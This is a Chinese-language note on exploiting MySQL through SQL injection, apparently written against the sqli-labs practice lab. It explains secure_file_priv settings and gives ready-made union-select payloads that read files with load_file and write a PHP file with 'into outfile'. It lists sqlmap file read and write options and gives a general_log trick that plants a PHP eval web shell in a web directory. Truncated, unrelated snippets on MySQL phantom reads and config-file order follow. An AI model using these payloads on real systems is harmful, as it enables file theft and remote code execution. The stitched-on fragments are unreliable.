1、需要條件
secure_file_priv不為null
1、限制mysqld 不允許匯入 | 匯出
secure_file_priv=null或secure_file_priv
2、限制mysqld 的匯入 | 匯出 只能發生在/tmp/目錄下
secure_file_priv=/tmp/
3、不對mysqld 的匯入 | 匯出做限制
secure_file_priv=
具有高許可權
1)讀檔案
load_file("d:\flag\1.txt")#檔案路徑需要轉義一下
' union select 1,load_file("d:\\1.txt"),3%23
2)寫檔案
into outfile "路徑"
')) union select 1,"<?php phpinfo();?>",3 into outfile "d:\\phpstudy\\www\\sql\\sqli-labs-master\\less-7\\1.php"%23
3)sqlmap讀寫
--file-read "路徑"
--file-write "要寫入的內容或所在檔案路徑" --file-dest "要寫入的路徑"
2、當secure_file_priv為null時的利用方法
set global general_log=on;set global general_log_file='c:/phpstudy/www/789.php';select '<?php eval($_post['a']) ?>';
mysql幻讀 mysql 幻讀
幻讀 phantom read 是指當使用者讀取某一範圍的資料行時,b事務在該範圍內插入了新行,當使用者再讀取該範圍的資料行時,會發現有新的 幻影 行。innodb和falcon儲存引擎通 過多版本併發控制機制解決了幻讀問題。a事務讀取了b事務已經提交的新增資料,此時 a 還沒有提交,當前提交後,也...
mysql配置檔案讀取順序
on unix,linux and mac os x,mysql programs read startup options from the following files,in the specified order top items are used first file name purp...
Mysql配置檔案讀取順序
一 mysql讀取配置檔案的順序 讀取順序 etc my.cnf etc mysql my.cnf usr etc my.cnf my.cnf 命令驗證 root mysql mysql verbose help grep my.cnf order of preference,my.cnf,mysq...